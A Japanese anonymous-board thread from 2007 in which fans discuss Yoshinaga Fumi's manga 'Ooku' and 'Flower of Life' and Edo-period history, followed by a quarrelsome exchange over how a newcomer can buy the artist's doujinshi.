537 :535:2007/01/14(日) 16:24:02 ID:???0
あ、肝心の一行抜けてた。

>>514
身分の高い人は、かなり時代が下がってからも(亨保あたりでも)
家の中では大抵下げ髪。嫁入り前の若い娘でも下げ髪。
でも出かける時には結ったらしい。




538 :花と名無しさん:2007/01/14(日) 16:48:02 ID:???0
江戸中期くらいまでのドレスコードの基本は
(複数の人間が同じ場所に居る時は)身分が下のものほどきっちりと正装するべし
正装することで「あなたのしもべです。お仕え致します」という気持ちを表してるわけ。
髪をきっちり結って帯も高く結んでしんどくても正装で仕事をする。

逆に言うと身分高い姫君や奥方は自分の圏内では「一番エライ」から
普段なら下げ髪に打ちかけ程度の軽い格好(品物は上級品)でもOKw
でも出かける際や身分ある客がある時、人によっては夫(男尊女卑だから)に会う時も正装するっぽいw


539 :花と名無しさん:2007/01/14(日) 16:52:25 ID:???0
先月のアフタにもでっかく大奥の広告が載ってたなー。丸々1ページ。

>533
あの大奥だとお万は実は生んでて、その子供をお玉につけてる設定ですぜ。
(ここらあたりはテレビシリーズ分)

540 :花と名無しさん:2007/01/14(日) 17:36:49 ID:???0
>>532
女嫌いのホモもなぜか女言葉を使ってたりするしね。
同族嫌悪かも
女でも「女は嫌い。男はねちねちしてなくていい」って言う人いるしねー

541 :花と名無しさん:2007/01/14(日) 17:43:23 ID:???0
実母には疎まれ、あんなすさまじい婆さんに溺愛されて育てられていれば、女が嫌になっても
仕方ないと思う。女は怖いもの、とすり込まれそう。
千恵の母親を犯したときも、春日に対してぶつくさ言っていたし、家光にとって春日は重すぎる
子離れさせてくれない母親だったんじゃないかな。
自立しようにも、ずっと春日の作った囲いの中で育ったからどうにもならないし。

しかし次回以降が春日が有功を始末して、捨蔵を後釜につけようとするものの、千恵は激しく
怒り復讐を決意。玉栄と手を組む…なんて展開だったら嫌だな。



542 :花と名無しさん:2007/01/14(日) 18:34:22 ID:???0
自分ももう少しフラワーについて語りたいけど
大奥のほうがネタが多いから仕方ないかなとも思う。

フラワーのラストシーンは見開きで2ページずつ使ったほうが良かったんじゃないかと。
ぱっと開いた時に3人いるように見えて
翔太が先に歩いてってハル太が顔を上げて前向きに進むという状況が分かりづらい。

543 :花と名無しさん:2007/01/14(日) 19:13:17 ID:???0
>>541
有功死ぬのは悲しいけど、そういう展開も結構燃える

544 :花と名無しさん:2007/01/14(日) 19:46:29 ID:???0
>>521
あー、それなら没日録なんてネガティブなタイトルも納得できる。
千恵の政治手腕もその伏線なのかもね。
女だということをカミングアウトして、跡目も女に継がせると宣言、
慌てる春日を玉栄と組んで政治から引き離す。
殺してやりたくはあるけど有巧が生きてたら嫌がるだろうから…とか。
でも玉栄は復讐に走って春日を殺しちゃうとか。

…でも有巧には生きて千恵と一緒に幸せになって欲しいな。

545 :花と名無しさん:2007/01/14(日) 21:27:12 ID:???0
>538
物知らずなので変な質問だったらごめん
お白州のシーンとか一番正装なのはお奉行様だよね?
他の町娘とか百姓って普段着だけどそれはいいの?

546 :花と名無しさん:2007/01/14(日) 21:41:30 ID:???0
捨蔵の身分を考えるとあのまま千恵に添わせるとは思えないし、
これまでの春日のやり方を見るとサクッと有功殺して身代わりが
一番ありそう。
多分母親を殺させただろう春日を遠ざける事も無かった千恵が
一気に春日離れして、表舞台に立ち実権握ろうとする程強い動機って
それ位しか無いと思うし。
そういえば千恵も玉栄も初体験はレイポで相手を殺してるんだね。

547 :花と名無しさん:2007/01/14(日) 21:43:04 ID:???0
>545
>538の言うドレスコードは封建社会での「士」以上の階級で適用されるもの。

548 :花と名無しさん:2007/01/14(日) 21:45:28 ID:???0
>>546
玉栄の場合、初体験は有功さまが住職になるはずだった京のお寺の坊さんでは?w

549 :花と名無しさん:2007/01/14(日) 22:31:10 ID:???0
下げ髪は、大垂髪の名残り。つまり古風ということ。
インフォーマルな場面でしか通用しないような
カジュアルな格好ということではないです。むしろ逆です。
武家諸候の夫人でもよっぽどの身分でなきゃ、儀礼的な時でしかしない髪型だ。
(将軍の正室は、そういう時にはほんとのおすべらかしを結う)

洋の東西を問わず、上流階級ほどファッションは保守的で変わらない。
つまり流行に疎い。疎い(左右されない)ことが上流であるとされた。
町方や娼婦のファッションが常に流行の先端であり発信源であったっていうことと
ちょうど対になってる。
だから最新流行のドレスや髪型で身を固めたアントワネット様の絵姿に、
マリア・テレジアは「まるで女優のようだ」嘆いちゃったりしたわけで。


550 :花と名無しさん:2007/01/14(日) 22:31:15 ID:???0
あれはお前なんかが初めてじゃないっていう玉栄の強がりだと思った。
有功が院主になるようなお寺で玉栄があんな目に遭うとは思えないし。

551 :花と名無しさん:2007/01/14(日) 22:37:23 ID:???0
うん、玉栄は有功についていたわけで、そうなると有功がそんなことを許すとは思えない。
「関東の田舎侍が。興もないド下手くそ」と罵ろうと思っただけだと思う。

有功はすでに大奥の中でも人心を掌握してるわけで、教養もない捨蔵(個人的にはスケコ
マシではあるけど悪人じゃないと思う。親のこととか心配はしてるみたいだし)が成り代われ
るわけもなし。
有功殺せば大奥の面々も春日に反感を持って、明確に千恵や玉栄の味方になるだろうね。

552 :花と名無しさん:2007/01/14(日) 22:41:21 ID:???0
有功より先に千恵が死ぬんじゃないかな
その後大奥の中で坊主に戻って?隠居するんでしょう

553 :花と名無しさん:2007/01/14(日) 22:56:45 ID:???0
だからその有功=有功じゃなくて捨蔵では?っていう話をしているんだよ

554 :花と名無しさん:2007/01/14(日) 23:11:04 ID:???0
手元に本がないからうろ覚えだけど史実でも
春日局がお万に似た女を江戸のどっかの寺参りの参道でスカウトして側室にしたのが「お楽」だったはず。
だから替え玉とかじゃなく単純に「七色飯」でお万もお楽も並び立つのでは?

555 :花と名無しさん:2007/01/14(日) 23:15:06 ID:???0
>553
それは無いだろー

556 :花と名無しさん:2007/01/14(日) 23:16:28 ID:???0
>>554
あ、そうだお楽は魚屋だかの威勢のいい町娘だから子種を宿しやすいだろうって判断されたんだよね
最初は物凄い抵抗するんだけど結局数ある側室の中で一番先にお子を宿す

557 :花と名無しさん:2007/01/14(日) 23:22:31 ID:???0
>最初は物凄い抵抗するんだけど結局数ある側室の中で一番先にお子を宿す
男女逆転だから局の押しつけに抵抗する千恵姫上様なんだろうか?
でも結局ほだされてやっちゃったらできました…みたいな?

558 :花と名無しさん:2007/01/14(日) 23:29:10 ID:???0
多分、生まれるまではイヤだって感じだけど
生まれたら慈しむだろうし、有功もそういう色んなことを納得の上で愛し続けるだろうね

っていうか有功は種無しなのか?


559 :花と名無しさん:2007/01/14(日) 23:41:29 ID:nCSrKw5KO
うん

560 :花と名無しさん:2007/01/14(日) 23:46:15 ID:???0
>>558
メロの最新連載状況では、1年も閨に出入りしてるのに千恵姫が
子を宿さないので、春日局が業を煮やして策を弄しようとしている。
…つまり有功は種なしと断罪されてしまったw

561 :花と名無しさん:2007/01/15(月) 00:04:39 ID:???0
断定はされたけど断罪はされてないだろw(断罪もありそうで恐いが)
種無しと判断されたらやっぱお褥すべりになるんだろうか

562 :花と名無しさん:2007/01/15(月) 00:08:55 ID:???0
多分、何人か跡継ぎ出来てホッとしたところで有功の子供が出来るんじゃないかな?
そういう展開がいい

563 :560:2007/01/15(月) 00:09:52 ID:???0
>>561
おっと入力間違えますたw  ○断定 ×断罪

564 :花と名無しさん:2007/01/15(月) 00:23:38 ID:???0
有功は種なし、かわからんけど
子作りしているカップルの80%は1年以内に妊娠するそうなので
子供ができにくい体質である事は確かだ。

千代が娘を産んだという過去は
彼女が石女ではない事を証明するエピソードだろうね。

565 :花と名無しさん:2007/01/15(月) 00:51:30 ID:???0
>>556
お楽は古着屋だよ。ただ身元を遡れば武士。
お楽自身は側室に上がることを別に嫌がってはいないよ。フジの大奥と混同してない?
あと、最初の子(女の子)を生んだのはお振、お楽は最初の男の子を産んだ側室。

家光の側室を全員出すのか、千恵姫には悪いけどちょっと楽しみ。
それぞれタイプの違った女性だったみたいだから、男女逆転だとどんな男達になるかな〜。

566 :花と名無しさん:2007/01/15(月) 00:57:30 ID:???0
>>550-551
「あんな目」っていうか、当時の感覚では「おつとめのひとつ」として
割と普通にこなす類のことだったみたいだよ。

567 :花と名無しさん:2007/01/15(月) 01:37:15 ID:???0
ここフジテレビのドラマ大奥と混合してる人多くてちょっと微妙…

568 :花と名無しさん:2007/01/15(月) 09:31:05 ID:???0
微妙じゃない意見を書けばいいじゃないか。
君のレスが一番微妙…

569 :花と名無しさん:2007/01/15(月) 09:38:03 ID:???0
>>486にあった「音羽の青年誌」ってモニのことだったんだね!

2月末から月イチで16p連載だってさー
(ソース:いつものサイトResource Index)

570 :花と名無しさん:2007/01/15(月) 09:41:32 ID:???0
史実とTV版の違いを誰か説明してほしい…


571 :花と名無しさん:2007/01/15(月) 09:56:59 ID:???0
後年のお万の派手で贅沢なイメージと
人々を救いたくて出家した有功のイメージが重ならない。
俗世の人間になっても基本的には変わってはいないし
あの有功がお万になるんだろうか。
どちらかといえば捨蔵のイメージなんだが。
彼にとっては一番つらいだろう二度と女を抱けない状態で
大奥で飼い殺し…それで鬱憤晴らしに贅沢に走るとか。

572 :花と名無しさん:2007/01/15(月) 10:15:05 ID:???0
>571
TVの大奥と混同してないか?
実際のお万の方は子がいなかったせいかあんまりたくさん記録も残ってない。
還俗して大奥入りした家光の死後も再度出家はせず、春日の跡を継いで大奥総取り締まりお梅の方になったという説もあるけどあやふやだし。


573 :花と名無しさん:2007/01/15(月) 10:18:35 ID:???0
1巻の「お万好み」の意匠は有功の好みだと思う
ぱっと見の派手さやきらびやかさはないけど極上品

574 :花と名無しさん:2007/01/15(月) 10:21:37 ID:???0
>>570
TV版は、現代劇をそのまま江戸時代に持ってきた
「トレンディ髷物」と言われるぐらい歴史を改変してます。
TVドラマは漫画を読む時は忘れた方がいいかと。

575 :花と名無しさん:2007/01/15(月) 12:23:10 ID:???0
逆転大奥では、奥入り前に、
あちこちで種をまいていた男が多いけど、
だとすると、肝心のお世継ぎに、
異母兄姉がゴロゴロいる可能性もあるよね。
特に吉宗公は、手足り次第という感じだったけど、
その辺は大丈夫なんだろうか。

576 :花と名無しさん:2007/01/15(月) 12:55:34 ID:???0
逆転大奥の世界では「子供は母親に属する」考えのようだから異母兄姉でも気にしないのでは?
なにしろ種買って子供を作るのが庶民のデフォだしw

577 :花と名無しさん:2007/01/15(月) 12:59:54 ID:???0
誰が産んだかが重要であって種は重要視されないっぽい。
もちろん種の出元の男も気に入るに越したことないだろうが…
婿を確保するのが一部の階級の贅沢になってる以上、種を気にしてたらやってられんのでは?

578 :花と名無しさん:2007/01/15(月) 13:13:54 ID:???0
>>575
母系社会では576.577の言うように母子の関係が重要。
種の方は割とどうでもいい。

579 :花と名無しさん:2007/01/15(月) 13:15:07 ID:???0
種を気にしないとしても近親婚の弊害とかは心配ないのだろうか?
江戸時代の人って行動範囲狭い気がするんだけど…

あ、もしかして「赤面疱瘡に強い遺伝子」を持つ男の種が増えつつあるとかかしら

580 :花と名無しさん:2007/01/15(月) 13:25:10 ID:???0
>>578
競馬の血統を思い出したw
同じ牝馬から生まれた仔は兄弟とか姉妹とか言われるけど
(種が同じだと全兄弟、種が違うと半兄弟)
種馬が同じでも“兄弟”という言い方はしない。

581 :花と名無しさん:2007/01/15(月) 13:52:09 ID:???0
春日局の死因って家光の為に薬断ちして治る病気も治らなかったと
いうけど、逆転大奥では本物の家光は既に他界している。
どうするんだろう。病気になってもわざと薬を与えなかったとかかな。

582 :花と名無しさん:2007/01/15(月) 13:55:49 ID:brR8hozp0
近親婚の禁止って戦後に制定されたから
江戸時代の意識ってどうなんだろ
父親が違う兄妹だったら結婚できたりしたよね

583 :花と名無しさん:2007/01/15(月) 14:07:57 ID:???O
近世ではさすがに兄弟婚はなかったんじゃない?
ていうか逆転大奥って何の話?

584 :花と名無しさん:2007/01/15(月) 14:24:36 ID:???0
>>582
平安時代かそれ以前だと
近親婚と呼ばれるのは同母の場合がメインで
異母はどうでもよかった(場合によっては奨励された)感があるけど、江戸くらいまで下るとどうなんだろうか?
天皇家はじめ親族内での婚姻も多かっただろうし、
江戸時代でも家同士を婚姻で繋ぐみたいなことは普通にあっただろうしね。

制度としてはともかく、
人々の間に禁忌意識が芽生えたのはかなり遅そう。
禁忌となった背景にはキリスト教文化の影響もあるだろうし。

585 :花と名無しさん:2007/01/15(月) 14:49:02 ID:???O
>>583
逆転大奥=よしなが版男女逆転

586 :花と名無しさん:2007/01/15(月) 14:55:11 ID:???0
そういえば少し前にやってたテレ東の大奥ミステリとかいう番組で、
家重(九代将軍)女性説やってたけど、見た人いる?
遺骨の骨盤が女性の特徴を持っているとかなんとか。

587 :花と名無しさん:2007/01/15(月) 19:24:55 ID:???0
>>580
競走馬で実際に重要視されるのは牡馬だけどね
問題になるのは父と母の父

牝馬の産む頭数は少なすぎて、統計的に語るのは難しいけど、有力種牡馬の仔は
何百何千だから統計的に分析しやすい

588 :花と名無しさん:2007/01/15(月) 21:55:12 ID:???O
吉野信子の「徳川の女たち」?「夫人たち」だったかな?
あれはお万の方様マンセーだった記憶がある
フジの「大奥」よりは参考になるのでは

589 :花と名無しさん:2007/01/16(火) 01:39:37 ID:???O
>>585
ありがとうフ

590 :花と名無しさん:2007/01/16(火) 12:42:01 ID:???O
親切にレスするんじゃなかった…携帯絵文字キモい…orz

591 :花と名無しさん:2007/01/16(火) 14:32:59 ID:???0
パソコンからでは「・」にしか見えないが、それ絵文字だったのかw
つか、携帯同士なら2上で絵文字表示されるとはしらんかった。

592 :花と名無しさん:2007/01/16(火) 14:54:48 ID:???0
うちは□に見える

593 :花と名無しさん:2007/01/16(火) 15:14:40 ID:???0
春日は悪役のままで行くのかねー。
どうにも大河ドラマのイメージが強いせいもあってか
いい人な所見たいと思ってしまうんだが

594 :花と名無しさん:2007/01/16(火) 15:26:02 ID:???0
>>591-592
携帯から見ると、ありがとうの後にハートマークがwww

595 :花と名無しさん:2007/01/16(火) 17:16:05 ID:???0
2でそれはキモイかもな
うちも・だわ

596 :花と名無しさん:2007/01/16(火) 17:57:53 ID:EFgCPLvsO
au使いだがしっかりハートが表示されてきもい

597 :花と名無しさん:2007/01/16(火) 17:59:15 ID:???O
au使いだがしっかりハートが表示されてきもい

598 :花と名無しさん:2007/01/16(火) 18:04:21 ID:???0
同性愛描写のある映画スキーが昂じて、よしながさんの御本に辿り着きました。
市販されているよしながさんの本は全て揃えましたが、
更に同人誌なる物があると最近知りました。

ちなみに純文学同人誌は、発売元にお金を払えば買えますが、
どうも漫画家さんの同人誌は違う?ようで、全く購入方法が解りません。

ペーパーとは何なのでしょうか?
ペーパー=振込用紙の事でしょうか? 年2回模様されるビッグサイト?に
行けばいいのですが、凄い人出だとTVでいつも中継になるので、
生憎当方は人宵が酷く、残念ながら行けません…
>>1で書かれてらっしゃる通り、新書館 WINGS編集部に
いきなり電話したら、1〜10まで教えてもらえるのかな?

熟練者の皆様、もし教えて頂ければ幸いです。

599 :花と名無しさん:2007/01/16(火) 19:18:00 ID:???O
>>598
電話はやめよう。
編集部に迷惑がかかる。

600 :花と名無しさん:2007/01/16(火) 19:25:54 ID:???0
>>598
>>1のどこに編集部に電話しろと書いてあるよ…
同人誌は自費出版物なんだから、新書館は関わってない。
よしながさんに手紙を届けるのに仲介してもらうだけ。

ペーパー=インフォメーションペーパー。要するに通販カタログ。
これを貰うために>>1にあるようにする。
あとはペーパーが届くまでひたすら待って、
届いたらそれに書いてあるようにすればいい。

つかネット環境があるならまず自分で調べてみればいいじゃん…

601 :花と名無しさん:2007/01/16(火) 19:25:58 ID:???0
>>598
お金の絡むことだから、こんなとこで聞くより
初心者向けの同人手引き書を買って良く勉強してからにした方がいいよ

602 :花と名無しさん:2007/01/16(火) 19:31:51 ID:???0
メルマガ経由でも方法があるのに
全然ぐぐったり調べたりしてないのね

603 :花と名無しさん:2007/01/16(火) 19:42:48 ID:???0
>>598
よしながさんの公式サイトいけば、同人誌ってものに対する見解とかも
えらく詳しく書いてあるよ。
イベントにいくのが一番手っ取り早いが、どうしても出来ないなら、
>>1に書いてある手段だけが頼みの綱だ。

604 :花と名無しさん:2007/01/16(火) 19:50:06 ID:???0
テンプレ百回読めとレスしようとして
念のため読みなおしたらテンプレ自体もいささか不親切
(ていうか情報が古い)だったw
自称非公認・実質公認サイトでメルマガが発行されてるから
最新の通販要項の取得についてはそこの指示に従うように、
ぐらいは、次回から足しておいてもいいんじゃないかと思う。
サイトURLの貼りつけがさすがにまずけりゃ、
それについてはぐぐるようにってことで。




605 :花と名無しさん:2007/01/16(火) 19:58:33 ID:???0
途中で送ってしまった。

本来同人活動には関係のないウィングスの編集部の
手間をわずわらすこともなくなるから
なるべくオンラインで取得する方法を勧めたほうがいいと思う。

606 :花と名無しさん:2007/01/16(火) 20:01:58 ID:???0
598ではないが、よしながの公式サイトってどこだろうと
ググって悩んだ漏れが通りますよっと…。
やっぱ赤字であちこちに「通販窓口ではありません」って
明記されたサイトが公認サイト?

ところで、フラワーの連載完結した訳だけど、次スレ立てる時に
Wings等で次作予定がなくても、窓口は「新書館・気付・よしなが先生」って事で
いいのかな?
今のところ「大奥」連載は数年かかりそうだから、「白泉社気付」でも良さそうな?


607 :花と名無しさん:2007/01/16(火) 20:12:29 ID:???0
どうやったら悩めるのかわからない
字が読めないとか、指示文の理解に難があるとかの障害がある人だったらスマソだが。

608 :花と名無しさん:2007/01/16(火) 20:14:39 ID:???0
スルーでいいのに

609 :花と名無しさん:2007/01/16(火) 20:20:18 ID:???0
次作はモーニングだから、
たしかにウイングス気付というのはまずいかも。
テンプレ変えた方がいいね。

610 :花と名無しさん:2007/01/16(火) 20:21:47 ID:???0
>>607
「*当サイトはよしなが先生ご本人並びに各出版社様とは無関係です*」って明記されてるから。
一般的にそう書いてあったら、作家ご本人は未公認の勝手サイト=個人サイトじゃない?
公認サイトなら、よしながふみ先生公認です、と明記しないのかな?
URLの一部は‘fc’だけど、それは個人でも使えるでしょう?

611 :花と名無しさん:2007/01/16(火) 20:22:42 ID:???0
>>610
おk
頭弱いのね

612 :花と名無しさん:2007/01/16(火) 20:27:16 ID:???0
自分で調べる気がない人はまん●らけででも買っとけばいいのに

613 :花と名無しさん:2007/01/16(火) 20:31:36 ID:???0
>>612
ま●だらけって何ですか?という質問が出るのがオチですがな

614 :606、610:2007/01/16(火) 20:39:57 ID:???0
>>613
「ま○だらけ」なら知ってるけどね。
>>603-604に出てきた>自称非公認・実質公認サイト=このスレでの公式サイトとして
共通認識になっているのがわかりずらいだけでそ。

615 :花と名無しさん:2007/01/16(火) 20:47:49 ID:???0
あーだこーだ言い訳くさいこういう手合いには、本当に読みたいならコミケに来やがれでございます、で済ませたい。
真島の情熱を見習えw

616 :花と名無しさん:2007/01/16(火) 20:50:22 ID:???0
真島は努力家だね、確かに
ヲタ方向以外はダメダメだけど

617 :花と名無しさん:2007/01/16(火) 20:51:27 ID:???0
あーだこーだ言い訳臭い人と598は別人じゃん


618 :花と名無しさん:2007/01/16(火) 20:53:14 ID:???0
コミケ♥って混むからイヤス

619 :花と名無しさん:2007/01/16(火) 20:53:34 ID:???0
>>615
いや、同人誌が読みたいのではなく、単に「よしながの公式サイト」が
本当に存在するのなら、それが見たくてあちこちググったり
漫画家や出版社の公式サイトのリンク集を検索してたんだけど。

最近このスレに出入りし始めたばかりで、今まで話題にもなって
ないし、テンプレにもないから、なさそうだな〜と思ってたのに、突然単語が出てたから。

620 :花と名無しさん:2007/01/16(火) 21:01:34 ID:???0
空気嫁ない障害っつのもあったね。そういや。

621 :花と名無しさん:2007/01/16(火) 21:01:44 ID:???0
>>598
ttp://yoshinagafc.web.infoseek.co.jp/
上のサイトのnewsletterというコンテンツから
メルマガ申し込んで、それに従って通販すればいいと思うよ

同人誌即売会は年2回のコミケ(@ビッグサイト)だけでなく
もっと人の少ないのもある
上のサイトのeventってところに
よしながさんのサークルが参加するイベントが書いてあるから
行く気があるならがんばって。

622 :花と名無しさん:2007/01/16(火) 21:10:05 ID:???0
>>620
スルーすればいいのに、いちいち煽ってくれるので言うけど、
ネット上で質問者(598さん)に対していい加減な言葉(公式サイト)を>>603さんは
レスしていて、それを598さん以外の人が読む可能性を知っているはずなのにね。

確かに前スレをざっとしか見てなくて、過去スレ全部は読めてないけど。
不用意な言葉を使ったことだけは、認識してくださいませ。

623 :花と名無しさん:2007/01/16(火) 21:13:12 ID:???0
>>622
2ちゃん向いてないよ、貴方。
ほんといい加減にしてくれないかな。

624 :花と名無しさん:2007/01/16(火) 21:15:39 ID:???0
ほんっとーに、あーだこーだ言い訳臭いね

直接そう指摘レスした訳でもないくせに
形勢悪くなると良識的なフリしちゃって、結局ただの揚げ足鳥。
前後のレスや流れすら読めないのにココまで上から目線になれるもんなのかw

625 :花と名無しさん:2007/01/16(火) 21:16:17 ID:???0
>>622
そろそろ退いたら?
ここは2ch
書いてあることが全部真実だと思うような輩は
来ない方がいい

626 :622:2007/01/16(火) 21:17:32 ID:???0
>>623
だから煽らないでスルーするか、他の話題ふればいいじゃん。マジでそう思って書いたのに。


627 :花と名無しさん:2007/01/16(火) 21:18:45 ID:???0
ぐぐれカス

で終わってもおかしくないものを
ここまで色々レスしてくれるスレも珍しいと思うんだけどな
2ちゃんに何を望んでるんだか。
言い訳臭い人がgdgdしてるせいで、質問者も気の毒だ。

628 :花と名無しさん:2007/01/16(火) 21:19:08 ID:???0
協会に誘導するのはやめませんか
特に今回のような流れでは
おそらく迷惑だと思うんですよ

629 :花と名無しさん:2007/01/16(火) 21:20:20 ID:???0
>>628
だから皆遠まわしな表現でレスしてたのに
一人全く空気の読めない人がいるからね。困ったもんだね。

630 :花と名無しさん:2007/01/16(火) 21:22:43 ID:???0
606が変な口挟まなければ
ヒントたっぷり&直接誘導なしで終わったのに

631 :花と名無しさん:2007/01/16(火) 21:23:12 ID:???0
まあ「公式サイト」という言葉が不適切なのは事実だし、
アホがそれを口実に特攻かけたら困るから、
テンプレに入れるならちゃんと明記しておいたほうがいい。


632 :花と名無しさん:2007/01/16(火) 21:24:26 ID:???0
>>631
しつこい

633 :花と名無しさん:2007/01/16(火) 21:25:40 ID:???0
不適切だと思ったなら
不適切では?とレスすればいいだけの話でしょ。
606は当初そういう話をしていなかったにも関わらず、
叩かれ始めた途端キレはじめたからいい加減にしろって言われてるんだよ
「まあ」で勝手に要約すんなw

634 :花と名無しさん:2007/01/16(火) 21:53:36 ID:???O
スレ住人をここまでバラバラにした質問者は
かなりの腕の釣り師

635 :花と名無しさん:2007/01/16(火) 21:59:13 ID:???0
はいはいはいはいクマークマークマー

隔月連載はモヤモヤするねぇ

636 :花と名無しさん:2007/01/16(火) 22:45:57 ID:???0
>>598追記
純文学同人誌を引き合いに出してくるところをみると、
純文学同人誌は読んだことがあるのかもしれないが、
漫画の自費出版物は、書店で売ってる漫画より高額です。
そのところあらかじめしっておいて下さい。
(パンピーだと判っていても、2のスレで「市販のコミックと比べると高い」
なんて言われるとモニョモニョするからさ)

637 :花と名無しさん:2007/01/17(水) 00:41:14 ID:???0
>609

同人はアンティークなんだから手紙の宛先は全部WINGS宛でいいんだよ

638 :花と名無しさん:2007/01/17(水) 00:43:08 ID:???0
パンピーが来る度荒れるので特に教えてちゃんには注意。
だいたい2ちゃん自体初半Rばかり

639 :花と名無しさん:2007/01/17(水) 03:03:56 ID:???0
同人板に池

でいいんじゃない?

640 :花と名無しさん:2007/01/17(水) 07:27:23 ID:???0
あちらでも同じ流れになるだけでしょうね


641 :花と名無しさん:2007/01/17(水) 09:33:39 ID:???0
おまいら!漫画の話しようぜ!
…わたしゃ現時点で語り尽くしてネタがない。
ので↓頼んだぞ!

642 :花と名無しさん:2007/01/17(水) 10:27:43 ID:???0
ループだが、
吉宗かっこよすぎっす。


643 :花と名無しさん:2007/01/17(水) 10:44:33 ID:???0
遅まきながらフラワーの最終話読んだ。
余韻もあって明るくていい終り方でうまいなぁと感心した。

シゲと間島はこの先どうなるかな…どうなると思う?

644 :花と名無しさん:2007/01/17(水) 13:43:46 ID:???0
気持ちが醒めた訳じゃないからあのままズルズルいくと思う。

645 :花と名無しさん:2007/01/17(水) 13:56:04 ID:???0
自分が俗物なのを認めた間島がシゲを追いかけると思う
真島の見境無くなった図って怖ろしい気もするがww

646 :花と名無しさん:2007/01/17(水) 21:26:07 ID:???O
この人の描くパーマ毛な女性が好きだ

647 :花と名無しさん:2007/01/17(水) 22:09:54 ID:???0
骨董に出てくるくるくるパーマが好きだ

648 :花と名無しさん:2007/01/17(水) 23:18:28 ID:???0
>645
血相変えておっかけてきたら、真島の好きそうなツンデレおでこ美少女姉属性の萌えキャラの、
同人誌でも投げてつけてやれば、ついそっち追いかけそうだから、そのうちに逃げろシゲww

649 :花と名無しさん:2007/01/18(木) 00:05:41 ID:???0
>>648
オニババにお札でも投げつけてるみたいだ

650 :花と名無しさん:2007/01/18(木) 00:50:12 ID:???0
シゲには真島と幸せ?になってもらいたいなあ。
小泉は落ち着いたらまた浮気するでしょ。
シゲも浮気しそうだけど。

651 :花と名無しさん:2007/01/18(木) 00:55:41 ID:???0
真島とシゲの組み合わせなら
浮気→オシオキの流れすらプレイの一種になりそうな予感

652 :花と名無しさん:2007/01/18(木) 10:18:59 ID:???0
その流れだと真島、「生身の女に言ってみたかった台詞」ベスト3は
余裕でシゲに対して言えそうだな。ある意味でハッピーなのか?w

653 :花と名無しさん :2007/01/18(木) 21:36:03 ID:???0
流れを読まないで遅レス。

>>588
×吉野信子→○吉屋信子。

確かに吉屋さんの『徳川の夫人たち』の方がフジの『大奥』よりは参考に
なると思う。(お万の人物像やセリフで小説の影響を受けていると思われる
ような所もあったし…)
しかしよしながさん版『大奥』でのお万とお玉の関係が良いと思う人には
あまりお薦め出来ないかも…。


654 :花と名無しさん:2007/01/21(日) 21:09:01 ID:???0
>>646-7
私もそうかも。飾らず、一筋縄ではいかないキャラが多い気がする。
私は貴族の娘(執事の分際)、津森(ソルフェージュ)のありえない
もっさもさヘアーが、ポンデライオンみたいでなんか好きだ。
でも話として見たいのは、くるくるパーマのなれそめと結婚だな・・・。

655 :花と名無しさん:2007/01/21(日) 21:48:43 ID:???0
執事の分際の貴族の娘はきれいだよねー。
生意気そうな鼻筋やまだ小さい胸をコルセットで持ち上げてるところなんかすごく萌えた。

656 :花と名無しさん:2007/01/21(日) 22:47:34 ID:???0
男だけどよしながふみの漫画を読みたい。
普通にブックオフとかに置いてある?

657 :花と名無しさん:2007/01/21(日) 22:50:23 ID:???0
>>656
うん。

けど意外と品薄だったり。
「西洋」とか「フラワー」が全部揃ってるとこ、近所では見かけないや。
だらけとかに行った方があるのかなー。(いや、自分は持ってますが)


658 :花と名無しさん:2007/01/21(日) 23:00:48 ID:???0
>>657
ありがとう。近いうちに読んで見ます。

659 :花と名無しさん:2007/01/22(月) 09:55:06 ID:???0
基本的にBL苦手なんですが

ジェラールとジャックに感動

660 :花と名無しさん:2007/01/22(月) 21:10:58 ID:???0
>>656
地域にもよるかも知れないけど、「西洋」はわりとすぐ見つかると思う。
「フラワー」は古本屋で見たことない。

661 :花と名無しさん:2007/01/22(月) 21:59:29 ID:???0
うちの地方(田舎)の古本屋でも「フラワー」「大奥」以外は
置いてるのよく見かける。

662 :花と名無しさん:2007/01/22(月) 22:43:09 ID:???0
つうか読みたきゃ新刊で買えよ。
取り寄せれば直ぐ手に入るぞ。

663 :花と名無しさん:2007/01/22(月) 22:54:51 ID:???0
やっとこさ「フラワー」読み終えた。
思ったよりここでネタにはなってないのな
何時も通りハッとさせられる上手さにスッキリした後味
久々に優しい漫画を読んだ。

こっから暫くは大奥に専念するのかしら
個人的にはホモ分が足りないぜ!
何にせよ、ご馳走様でした。

664 :花と名無しさん:2007/01/22(月) 23:48:20 ID:???0
>>663
フラワーは
コミックス派の為にあえて直接的な話題を差し控えてくれてるんだと思っていた

というか自分がコミックス派w

665 :花と名無しさん:2007/01/23(火) 00:08:47 ID:???0
フラワーは立ち読みだから詳しく語りたいけど
コミックスが出るまで待ってる派

666 :花と名無しさん:2007/01/23(火) 23:22:50 ID:???0
愛すべき娘達を読み返して、いくつか気付いた。

祖父が晩年、あっさり変節したことを「呆けかけていたのかも」と言う爽子
→勿論頑固なまでに思想を守ってきたのとかけはなれたあっさりさでそう思うのは無理ないけど、
 爽子の素直に物事を受け入れる性格からすると、「あっさり変節する祖父」を受け入れがたい気
 持ちがどこかにあったのか?なぜならそれは自分の人生そのものでもあるから。
 だから龍彦に「あなたのおじいさんのそういうところが偉い」と言われて、芽生え始めている龍彦
 への恋心もプラスされて「苦しい」んだろうか。
投獄されても拷問されても変えなかった信念を晩年に変えた祖父
→勿論人々が自ら自分の信じる方向でない方を選択していくのを目の当たりにした、というのもあ
 るだろう。けれど自分の理想の粋を極めたような孫娘が、それこそ「いい子すぎて心配になる」ほ
 どに人間離れして育ってしまったことを見通していたのでは?(祖父自身は普通に結婚し、子供
 や孫を愛した人だったし)

読む度にどこかあたらしいところに目を向けさせられる。

667 :花と名無しさん:2007/01/24(水) 00:55:05 ID:???0
苦しいのは逆じゃない?人としては尊敬出来るのに、恋心が芽生えないから苦しいんだよ。

668 :花と名無しさん:2007/01/24(水) 08:14:35 ID:???0
そうだね、
いくら尊敬はできたところで、
恋や愛情ってのは、結局のところその人だけを特別扱いにするわけで、
愛情があればそれは当然のことで当たり前な流れなんだけど、
爽子にはそれが不可能だった。
ないものを与えてくれと要求されるのは苦しいものだよ。
だから尼僧になるというラストには納得できた。


669 :花と名無しさん:2007/01/24(水) 10:11:28 ID:???0
>666
莢子の祖父の場合、やせ我慢の美学みたいなもんでは?
自分の「するべき行動」をする自分に到達するための努力や節制を「理性」で行ってる。
それが病気で気が弱くなったり、莢子という人格に触れてぽろっと本音が出ただけかと
莢子の「ぼけかけていたのかも」発言はそういう「理性のタガが緩くなった」状態を指してるのかなーと。

